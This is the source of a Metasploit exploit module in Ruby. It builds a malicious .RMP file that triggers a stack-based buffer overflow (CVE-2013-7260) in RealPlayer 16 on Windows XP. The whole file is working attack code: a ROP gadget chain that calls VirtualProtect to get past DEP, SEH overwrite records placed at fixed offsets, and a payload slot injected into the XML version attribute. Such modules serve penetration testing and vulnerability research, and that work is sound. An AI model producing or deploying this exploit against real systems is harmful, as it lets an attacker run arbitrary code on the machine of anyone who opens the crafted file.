modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'RealNetworks RealPlayer Version Attribute Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
improper bounds checking of the version and encoding attributes inside
the XML declaration.
By persuading the victim to open a specially-crafted .RMP file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gabor Seljan' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'BID', '64695' ],
[ 'EDB', '30468' ],
[ 'OSVDB', '101356' ],
[ 'CVE', '2013-7260' ],
[ 'US-CERT-VU', '698278' ],
[ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x22",
'Space' => 2396
},
'Targets' =>
[
[ 'Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32',
{
'OffsetROP' => 44,
'OffsetMenu' => 11052, # Open via File -> Open
'Ret' => 0x5acceecd # ADD ESP,428 # RETN 10 [mswmdm.dll]
}
],
],
'Privileged' => false,
'DisclosureDate' => '2013-12-20',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp'])
],
self.class)
end
def exploit
rop_nop =
[
0x77c1c552 # RETN (ROP NOP) [msvcrt.dll]
].flatten.pack('V*')
rop_gadgets =
[
0x77c21d16, # POP EAX # RETN [msvcrt.dll]
0x77c11120, # &VirtualProtect() [IAT msvcrt.dll]
0x77c1bb36, # POP EBP # RETN [msvcrt.dll]
0x77c20497, # skip 4 bytes [msvcrt.dll]
0x77c2362c, # POP EBX # RETN [msvcrt.dll]
0x0000095c, # 0x0000095C-> EBC
0x5acb2caf, # POP EDX # RETN [mswmdm.dll]
0x00000040, # 0x00000040-> EDX
0x77c1f519, # POP ECX # RETN [msvcrt.dll]
0x77C5D305, # &Writable location [msvcrt.dll]
0x77c23b47, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c2ed13, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # PUSH ESP # RETN [msvcrt.dll]
].flatten.pack('V*')
sploit = rand_text_alpha_upper(target['OffsetROP'])
sploit << rop_nop
sploit << make_nops(16)
sploit << rop_gadgets
sploit << make_nops(16)
sploit << payload.encoded
sploit << generate_seh_record(target.ret) # Open via double click (2540)
sploit << rand_text_alpha_upper(target['OffsetMenu'])
sploit << generate_seh_record(target.ret) # Open via File -> Open (13600)
sploit << rand_text_alpha_upper(17000) # Generate exception
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create("<?xml version=\"" + sploit + "\"?>")
end
end